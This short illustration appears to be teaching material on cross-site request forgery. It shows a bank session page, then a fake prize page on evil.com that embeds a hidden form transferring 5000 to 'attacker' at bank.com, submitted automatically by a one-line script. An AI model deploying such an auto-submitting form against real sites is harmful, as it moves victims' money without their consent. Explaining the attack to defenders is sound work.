https://bank.com/account
Welcome back, Alex
You are logged in. Your session cookie is set for bank.com.
https://evil.com/win-a-prize
🎉 You've won!
Just click anywhere to claim your reward...
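<!-- Form embedded in the evil.com page; it targets bank.com, so the request rides on the session cookie set for bank.com -->
<form action="https://bank.com/transfer">
  <input name="to" value="attacker">
  <input name="amount" value="5000">
</form>
<!-- Submits the form without any action by the user -->
<script>document.forms[0].submit()</script>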